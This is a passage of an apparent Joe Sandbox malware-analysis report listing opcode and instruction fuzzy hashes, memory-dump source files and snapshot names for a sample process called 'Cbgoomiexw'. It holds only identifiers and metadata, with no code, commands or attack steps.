                                          • Opcode Fuzzy Hash: 843088ceec3c03ec85a7be024ad7bc0ef55c6d257069d9a2489a996a2a9c5257
                                          • Instruction Fuzzy Hash: 17D01770C0A208EFC704DFB4E5066ADBBB8EB4B305F1081A9981827240CB702E94DBE5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddb9296e626c1f349d84754e827a6e5be30147529b044bc091aa5735c7a517b5
                                          • Instruction ID: f1edfa24c01864ffefde250d461b3b0b688aa39cdca8d5dc9fe6ef393d50299f
                                          • Opcode Fuzzy Hash: ddb9296e626c1f349d84754e827a6e5be30147529b044bc091aa5735c7a517b5
                                          • Instruction Fuzzy Hash: 11D0223800A3887FCF020A34FC41CD73F6E8B222207014193F1808A023C623BA62D7F2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae6a6d2b72dded8922c84e9de703d7423a0c1ea30e491a01831dcef5aad07222
                                          • Instruction ID: 9b7def081920d2da364f69947c6863c76ab0db63a70b89964911a43062abe9d2
                                          • Opcode Fuzzy Hash: ae6a6d2b72dded8922c84e9de703d7423a0c1ea30e491a01831dcef5aad07222
                                          • Instruction Fuzzy Hash: FAE01270A0120DEFCB40DFA4D90069DBBF6EB44301F2045A9D50DD3348EA715F049B91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 881f0cfbf95c747e08473ca13fbcdecdbc3ced10e9e69d9d80051b9cd8257850
                                          • Instruction ID: 538f6998f90d85ca99650035244475cca54dd996d4e8d6b01dedebbd0e2e1efa
                                          • Opcode Fuzzy Hash: 881f0cfbf95c747e08473ca13fbcdecdbc3ced10e9e69d9d80051b9cd8257850
                                          • Instruction Fuzzy Hash: 22E0E534A00318CFDB94EF20D858799BBB2EB85301F0084DA990A67354CB305E89CF85
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c79d6bb39c95f3f330c3558c432a6742322511dc74fcea91995555896c529f60
                                          • Instruction ID: a33f5f755096354486773600d29f50991d2873e90538ca4276ec43e1939f2e2f
                                          • Opcode Fuzzy Hash: c79d6bb39c95f3f330c3558c432a6742322511dc74fcea91995555896c529f60
                                          • Instruction Fuzzy Hash: EEE01A70A00218CFD794EF50D89979DBFB3EB55300F1080DA950A73354DA305E868FA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bb1c80dbd11c80950412712574833a24cefe5430ceb1172849ba3f9725f44e5
                                          • Instruction ID: 67b66ddb1ab89d2c111c47ccbb248977aff492759794e4cf6f03222c7aafb9e7
                                          • Opcode Fuzzy Hash: 0bb1c80dbd11c80950412712574833a24cefe5430ceb1172849ba3f9725f44e5
                                          • Instruction Fuzzy Hash: A7E012B0A00315CFD724DF50E85975E7BB2FB88301F0010E9D505A7744EB305D848F40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c27af67467aaea27d82caa1a7f29de5d4ca16aeef6579455a434adcc4a9d1a00
                                          • Instruction ID: 629655cf5078c89bd420cd4125457754f030cf590f883ae014fda2e2d78a163a
                                          • Opcode Fuzzy Hash: c27af67467aaea27d82caa1a7f29de5d4ca16aeef6579455a434adcc4a9d1a00
                                          • Instruction Fuzzy Hash: 36E09A70A00359CFE794EF54E8A8B99BBB2EB89305F1080DA950AB7384DB305D85CF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f640285db3d9625cd5e4ebbe432fede4d1934af3027fb69a9bd61c858fab6c0b
                                          • Instruction ID: 04732c7c38b0b519be213591e0e2e32c15edf8198dd5f1ca9ca2058806f7e3d3
                                          • Opcode Fuzzy Hash: f640285db3d9625cd5e4ebbe432fede4d1934af3027fb69a9bd61c858fab6c0b
                                          • Instruction Fuzzy Hash: E0E0EE34A04218CFDB24EF20DA9579DBBB2EB86300F0040EAD60AB3254CB305F808F96
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b68d8fe7ef55dd2590e46db9821a56ed76064a46c3db60759dcc7d91058a017
                                          • Instruction ID: e23a5cf29824cd11fe0957f660783d2e293156e5dcb0cf94887e47c05b5c01ba
                                          • Opcode Fuzzy Hash: 1b68d8fe7ef55dd2590e46db9821a56ed76064a46c3db60759dcc7d91058a017
                                          • Instruction Fuzzy Hash: D6E01A70A01218CFEB10EF20D9A9B99BBB2FB89301F0041DAD60AA3394CB305D858F54
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 639db1408482e385ed96113b86aec2f3eeb40bbfe3adb7bea27356f1e9046ed8
                                          • Instruction ID: f5977199a832123aeff89953bb9c064f637677e0e1f7b225a632a726290aebf9
                                          • Opcode Fuzzy Hash: 639db1408482e385ed96113b86aec2f3eeb40bbfe3adb7bea27356f1e9046ed8
                                          • Instruction Fuzzy Hash: 05E07570E04254CFDB94EF14D95579EBBB2EB85310F1000D9D50A67354CB345E848F52
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a46ef125f15f921f0527c9563aca1e8c4c4cced70be7a9e084a48796a7e4c2ca
                                          • Instruction ID: 595101402e925700d83ad81324f762c63e2686994c12aaf250ce2e9185d5aec7
                                          • Opcode Fuzzy Hash: a46ef125f15f921f0527c9563aca1e8c4c4cced70be7a9e084a48796a7e4c2ca
                                          • Instruction Fuzzy Hash: C1C0123804E3C02EDB3206723C02BA93F395B83B20F2801CFE1C0C90C3C48615898332
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4353ef5981845ecee0e95f7181e53a3427f42cc96b9c2183efd1d9c006be66f
                                          • Instruction ID: 7cac68d855279e7627e4532cbda99013201aabb26a34198e1812065fc1560e1a
                                          • Opcode Fuzzy Hash: b4353ef5981845ecee0e95f7181e53a3427f42cc96b9c2183efd1d9c006be66f
                                          • Instruction Fuzzy Hash: B3E0EC70C45369CFDBA4CF24DC487AAB7B5BB0034AF006695800D63564CB741EC4CF85
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0721a1cc30b59835c54508cae6d61cafd1008c96afb7e552f324a97bf8252b9
                                          • Instruction ID: 3676a50f0f4566744cda1250da5577b6d2358e0d6deb21ee2cd9bf804f21b779
                                          • Opcode Fuzzy Hash: b0721a1cc30b59835c54508cae6d61cafd1008c96afb7e552f324a97bf8252b9
                                          • Instruction Fuzzy Hash: 2ED017B0E143388FDB54EF34D90466A77BAAB84305F005695840EA7649C7388A858F84
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64580fb24e2bcf549565d11e6b8076a7f771dc84ff918df0b1ce79156f73bd05
                                          • Instruction ID: 3676a50f0f4566744cda1250da5577b6d2358e0d6deb21ee2cd9bf804f21b779
                                          • Opcode Fuzzy Hash: 64580fb24e2bcf549565d11e6b8076a7f771dc84ff918df0b1ce79156f73bd05
                                          • Instruction Fuzzy Hash: 2ED017B0E143388FDB54EF34D90466A77BAAB84305F005695840EA7649C7388A858F84
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15d9f0920e81feb6216f59875da569c59d1697b0b69ebe154538ae4f0b305a08
                                          • Instruction ID: 46a2e07359f8be6be6a31319a69beb043962650c599725f6013a033257125bed
                                          • Opcode Fuzzy Hash: 15d9f0920e81feb6216f59875da569c59d1697b0b69ebe154538ae4f0b305a08
                                          • Instruction Fuzzy Hash: E0C02B3048E304CAE24816B4E01E77277ACC30F301F401920520C020918BF114B4CAF1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f142b9847cd28b60d1b39beeec0baa5655f89f018ae59255fa38ec3a68f96f7e
                                          • Instruction ID: cce5bb054665c33ca1691ce76037b0ce4ebd3a5b1eb51883e9782da0ed405150
                                          • Opcode Fuzzy Hash: f142b9847cd28b60d1b39beeec0baa5655f89f018ae59255fa38ec3a68f96f7e
                                          • Instruction Fuzzy Hash: 41C08C30708300CBF340AF50D05A21A7A32D782304F00501A520233688CA7448448B85
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aaf28d5ca540260e6995bcb75e695b439951518ec32f5b75e09b3624c9d8462e
                                          • Instruction ID: f1abdb6fba0db958948750265b8e8ba939da8f501da60297d4ee94bdaf3782ae
                                          • Opcode Fuzzy Hash: aaf28d5ca540260e6995bcb75e695b439951518ec32f5b75e09b3624c9d8462e
                                          • Instruction Fuzzy Hash: D3B09232040208AB8A059A84E904855BF69AB986107008125B6090A5118B33A822EA94